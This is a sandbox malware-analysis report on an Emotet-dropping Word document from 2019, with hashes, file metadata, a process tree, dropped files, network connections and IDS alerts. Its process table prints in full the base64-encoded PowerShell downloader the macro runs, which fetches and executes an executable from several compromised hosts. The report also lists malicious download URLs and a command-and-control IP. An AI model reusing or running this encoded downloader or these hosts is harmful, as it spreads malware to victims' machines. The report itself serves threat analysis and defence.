analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
File name:

LLC_10086261027_1008.doc

Full analysis: https://app.any.run/tasks/f9a0a85c-79c8-4af8-8e4f-4154cab97f1a
Verdict: Malicious activity
Threats:

Emotet is one of the most dangerous trojans ever created. Over the course of its lifetime, it was upgraded to become a very destructive malware. It targets mostly corporate victims but even private users get infected in mass spam email campaigns.

Analysis date: October 09, 2019, 15:04:32
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
macros
macros-on-open
generated-doc
emotet-doc
emotet
loader
Indicators:
MIME: application/msword
File info: Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Title: circuit, Subject: Rubber, Author: Elta Fisher, Keywords: virtual, Comments: calculate, Template: Normal.dotm, Last Saved By: Yadira Lowe, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Tue Oct 8 20:09:00 2019, Last Saved Time/Date: Tue Oct 8 20:09:00 2019, Number of Pages: 1, Number of Words: 30, Number of Characters: 174, Security: 0
MD5:

67EED9E259A3CCF22090DB94CA3F9AE0

SHA1:

0259622CEC555873436F852584C8D0B0B86D6247

SHA256:

5AAAA80D5D41587DD1F10F00FE87284A2DAFB4E223A4B938D8798AE46B762F8C

SSDEEP:

3072:foLfHlSC+V2uKgdzSrGdKyIwLx3PB/o9KqkqKLGrMBMHaUHPspoxsRPc0e22eemp:ALfHlxuKUzSKnLx3PBp+MBcTNUr2Ta6

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Application was dropped or rewritten from another process

      • 689.exe (PID: 3804)
      • 689.exe (PID: 3252)
      • msptermsizes.exe (PID: 4080)
      • msptermsizes.exe (PID: 1812)
    • Downloads executable files from the Internet

      • powershell.exe (PID: 3704)
    • Emotet process was detected

      • 689.exe (PID: 3804)
  • SUSPICIOUS

    • PowerShell script executed

      • powershell.exe (PID: 3704)
    • Executable content was dropped or overwritten

      • powershell.exe (PID: 3704)
      • 689.exe (PID: 3804)
    • Creates files in the user directory

      • powershell.exe (PID: 3704)
    • Executed via WMI

      • powershell.exe (PID: 3704)
    • Starts itself from another location

      • 689.exe (PID: 3804)
    • Application launched itself

      • msptermsizes.exe (PID: 4080)
  • INFO

    • Reads Microsoft Office registry keys

      • WINWORD.EXE (PID: 3316)
    • Creates files in the user directory

      • WINWORD.EXE (PID: 3316)
    • Dropped object may contain Bitcoin addresses

      • powershell.exe (PID: 3704)
      • 689.exe (PID: 3804)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.doc | Microsoft Word document (54.2)
.doc | Microsoft Word document (old ver.) (32.2)

EXIF

FlashPix

CompObjUserType: Microsoft Word 97-2003 Document
CompObjUserTypeLen: 32
Manager: Langosh
HeadingPairs:
  • Title
  • 1
TitleOfParts: -
HyperlinksChanged: No
SharedDoc: No
LinksUpToDate: No
ScaleCrop: No
AppVersion: 16
CharCountWithSpaces: 203
Paragraphs: 1
Lines: 1
Company: Gottlieb - Hirthe
CodePage: Windows Latin 1 (Western European)
Security: None
Characters: 174
Words: 30
Pages: 1
ModifyDate: 2019:10:08 19:09:00
CreateDate: 2019:10:08 19:09:00
TotalEditTime: -
Software: Microsoft Office Word
RevisionNumber: 1
LastModifiedBy: Yadira Lowe
Template: Normal.dotm
Comments: calculate
Keywords: virtual
Author: Elta Fisher
Subject: Rubber
Title: circuit
No data.
screenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
40
Monitored processes
6
Malicious processes
3
Suspicious processes
0

Behavior graph

Click at the process to see the details
start drop and start drop and start winword.exe no specs powershell.exe 689.exe no specs #EMOTET 689.exe msptermsizes.exe no specs msptermsizes.exe

Process information

PID
CMD
Path
Indicators
Parent process
3316"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\LLC_10086261027_1008.doc"C:\Program Files\Microsoft Office\Office14\WINWORD.EXEexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Word
Version:
14.0.6024.1000
3704powershell -enco PAAjACAAaAB0AHQAcABzADoALwAvAHcAdwB3AC4AbQBpAGMAcgBvAHMAbwBmAHQALgBjAG8AbQAvACAAIwA+ACAAJABjADkAYwA0ADMAMAAwADMANgB4ADcANgA2AD0AJwB4ADgANgAwADIAMwAzADAAMwAwADgAMABiACcAOwAkAGIAMQAxAGMANABiADAANQAwADMAMAAxACAAPQAgACcANgA4ADkAJwA7ACQAYgB4ADAAMgAzADgAMwAzADYAOQAxAD0AJwBiADAANwA3ADkAMAA5ADEAMgAzADQAJwA7ACQAYwA3ADgAMwAwADkANwA4AHgAeAAwADAAOAA9ACQAZQBuAHYAOgB1AHMAZQByAHAAcgBvAGYAaQBsAGUAKwAnAFwAJwArACQAYgAxADEAYwA0AGIAMAA1ADAAMwAwADEAKwAnAC4AZQB4AGUAJwA7ACQAYwA1ADkAYgAwADgANQB4AGIANgA3AHgANQA9ACcAeAA1ADYAYgA4ADgAMABiAHgAMQA0ACcAOwAkAGIAYgB4ADUANwAxADEAMgA5ADkAMAA9AC4AKAAnAG4AZQAnACsAJwB3AC0AbwBiACcAKwAnAGoAZQBjAHQAJwApACAAbgBFAHQALgBXAEUAQgBjAGwAaQBFAE4AdAA7ACQAYgAzADkAOAAwAHgAOQA2ADAAMAAwADIAPQAnAGgAdAB0AHAAcwA6AC8ALwAxAGcAcgBlAGEAdAByAGUAYQBsAGUAcwB0AGEAdABlAHMAYQBsAGUAcwAuAGMAbwBtAC8AdABoAGUAcgBvAGIAaQBuAGgAbwBvAGQAZgBvAHUAbgBkAGEAdABpAG8AbgAvADUAZgAzAHQAbgBfAHQAeQA1AHkAMwBvAC0AMQA1ADAANwA0ADAANgA4ADIALwBAAGgAdAB0AHAAOgAvAC8AdwB3AHcALgBtAGUAZAB5AHUAbQBzAHUAbABlAHkAbQBhAG4AcwBpAGsAYQB5AGUAdAAuAGMAbwBtAC8AeQBoAG8AZgBsAGUAcwAvAFUAVQBFAGEAawBjAFYAVwAvAEAAaAB0AHQAcABzADoALwAvAHcAdwB3AC4AcwB0AG8AbgBlAHIAZwBpAHIAbABkAGkAYQByAHkALgBjAG8AbQAvAHcAcAAtAGMAbwBuAHQAZQBuAHQALwB0ADIAdQBrAGoAMgA4AHQAXwA2AHYAOQA5ADkAOQBlAGYAdgBsAC0AMAAvAEAAaAB0AHQAcABzADoALwAvAGEAYgBjAGMAbwBuAGMAcgBlAHQAZQBpAG4AYwAuAGMAbwBtAC8AZABlAGwAZQB0AGUAXwBhAHMAcwBvAGMALwBmAHUAZQBkAFIAeQB0AHkAeQAvAEAAaAB0AHQAcABzADoALwAvAHMAYQBuAGQAYgBvAHgALgBpAGEAbQByAG8AYgBlAHIAdAB2AC4AYwBvAG0ALwB5AG4AaQBiAGcAawBkADYANQBqAGYALwBTAFQAYQBPAGoAcABmAEcAagAvACcALgAiAFMAUABsAGAAaQBUACIAKAAnAEAAJwApADsAJABjADEAOQA1ADAAMwAwADAANwA1ADAANwA9ACcAYgAzADAANwAyADYANAB4ADAAMAAzACcAOwBmAG8AcgBlAGEAYwBoACgAJAB4ADAAMAA0AGMANQAwADAANgAwADYAIABpAG4AIAAkAGIAMwA5ADgAMAB4ADkANgAwADAAMAAyACkAewB0AHIAeQB7ACQAYgBiAHgANQA3ADEAMQAyADkAOQAwAC4AIgBkAG8AYAB3AGAATgBMAG8AYABBAEQARgBJAGwAZQAiACgAJAB4ADAAMAA0AGMANQAwADAANgAwADYALAAgACQAYwA3ADgAMwAwADkANwA4AHgAeAAwADAAOAApADsAJABjADQAOAAwADUAMABiADIAMAAwAGIAPQAnAGIANAA3ADAAOAA1ADQANgAxADkAeAAnADsASQBmACAAKAAoACYAKAAnAEcAZQAnACsAJwB0ACcAKwAnAC0ASQB0AGUAbQAnACkAIAAkAGMANwA4ADMAMAA5ADcAOAB4AHgAMAAwADgAKQAuACIATABgAEUATgBHAHQAaAAiACAALQBnAGUAIAAzADIANgA2ADMAKQAgAHsAWwBEAGkAYQBnAG4AbwBzAHQAaQBjAHMALgBQAHIAbwBjAGUAcwBzAF0AOgA6ACIAcwBgAFQAQQBSAHQAIgAoACQAYwA3ADgAMwAwADkANwA4AHgAeAAwADAAOAApADsAJABjADAAMwAwAGMAeAB4ADAANgAwADgAPQAnAHgAMAA4ADYAMAA0ADEAYgB4ADQAMABiADAAJwA7AGIAcgBlAGEAawA7ACQAYwA4ADcAMQAzADgAYwA1ADYAMAAwAGMAeAA9ACcAYgAzADEAMAAyADgANwAxAGMAMQAwAGIAMAAnAH0AfQBjAGEAdABjAGgAewB9AH0AJABjADIANwAxAGMAMAAzADQAYgB4ADAAMwA9ACcAYwAxAGMANQBiADAANgAwAGIAYwBjAGMAJwA=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
wmiprvse.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
3252"C:\Users\admin\689.exe" C:\Users\admin\689.exepowershell.exe
User:
admin
Company:
Monkey Head Software
Integrity Level:
MEDIUM
Description:
Monkey Head Media Stream
Exit code:
0
Version:
1, 0, 0, 1
3804--c31de7b5C:\Users\admin\689.exe
689.exe
User:
admin
Company:
Monkey Head Software
Integrity Level:
MEDIUM
Description:
Monkey Head Media Stream
Exit code:
0
Version:
1, 0, 0, 1
4080"C:\Users\admin\AppData\Local\msptermsizes\msptermsizes.exe"C:\Users\admin\AppData\Local\msptermsizes\msptermsizes.exe689.exe
User:
admin
Company:
Monkey Head Software
Integrity Level:
MEDIUM
Description:
Monkey Head Media Stream
Exit code:
0
Version:
1, 0, 0, 1
1812--f91b2738C:\Users\admin\AppData\Local\msptermsizes\msptermsizes.exe
msptermsizes.exe
User:
admin
Company:
Monkey Head Software
Integrity Level:
MEDIUM
Description:
Monkey Head Media Stream
Version:
1, 0, 0, 1
Total events
1 728
Read events
1 238
Write events
0
Delete events
0

Modification events

No data
Executable files
2
Suspicious files
2
Text files
0
Unknown types
15

Dropped files

PID
Process
Filename
Type
3316WINWORD.EXEC:\Users\admin\AppData\Local\Temp\CVR4032.tmp.cvr
MD5:
SHA256:
3704powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\UVH9SPHW98CQC3JEXTX7.temp
MD5:
SHA256:
3316WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\A1B2DA33.wmfwmf
MD5:C54F08A1A3D4E434B0F3E06B2E8C898A
SHA256:F865E2370972554AC40AFF1CBDC4DF8C2546669786A16395606D7E045C2E4318
3704powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-msbinary
MD5:C911F7DBBF8956A476A7162FD7A88B15
SHA256:2D59CFC009032C59A8A26237F4091BD155E115DA834FF623AF40BC693711AF85
3316WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\89F2BA15.wmfwmf
MD5:BC6C211D3E8AEAECDA1617F5187AF84F
SHA256:D4FF413303ACD16CA8FE56E7C9451A1191112D558F696FEBF7BF48081118B8D4
3316WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\E384D112.wmfwmf
MD5:B131A2DDA1CD2BFB3A8BEFFDB7BD4C0E
SHA256:10AC2D2643A6C514968757D19738839BC34EB91E23519F0A7A70456512138CB2
3316WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\E3CDC9EB.wmfwmf
MD5:3461F1732E966125C95A57A06BE4B33F
SHA256:00BE749702711332894B7943102D229797CCC63456B3A14C12B750492B147864
3316WINWORD.EXEC:\Users\admin\AppData\Local\Temp\Word8.0\MSForms.exdtlb
MD5:B0326BEF216E68080949B3BDFD6DABFF
SHA256:80FE7DF4D87EC0A0F2D2A89909C73F50E798F48EFAA8C3F630BE555F4C21CFFC
3704powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF114b4e.TMPbinary
MD5:C911F7DBBF8956A476A7162FD7A88B15
SHA256:2D59CFC009032C59A8A26237F4091BD155E115DA834FF623AF40BC693711AF85
3316WINWORD.EXEC:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotmpgc
MD5:09BC5C438FE6D88159769A068F2652FB
SHA256:A90930ED628F1CBFF6D1218AB443EFDBCF80943439C51CB29CC3C42F17B525EF
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
2
TCP/UDP connections
4
DNS requests
2
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
3704
powershell.exe
GET
200
160.153.129.231:80
http://www.medyumsuleymansikayet.com/yhofles/UUEakcVW/
US
executable
604 Kb
malicious
1812
msptermsizes.exe
POST
23.239.29.211:443
http://23.239.29.211:443/splash/merge/
US
malicious
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
3704
powershell.exe
160.153.129.231:80
www.medyumsuleymansikayet.com
GoDaddy.com, LLC
US
malicious
3704
powershell.exe
23.229.205.99:443
1greatrealestatesales.com
GoDaddy.com, LLC
US
unknown
1812
msptermsizes.exe
23.239.29.211:443
Linode, LLC
US
malicious

DNS requests

Domain
IP
Reputation
1greatrealestatesales.com
  • 23.229.205.99
unknown
www.medyumsuleymansikayet.com
  • 160.153.129.231
malicious

Threats

PID
Process
Class
Message
3704
powershell.exe
Potential Corporate Privacy Violation
ET POLICY PE EXE or DLL Windows file download HTTP
3704
powershell.exe
Potentially Bad Traffic
ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download
3704
powershell.exe
Misc activity
ET INFO EXE - Served Attached HTTP
No debug info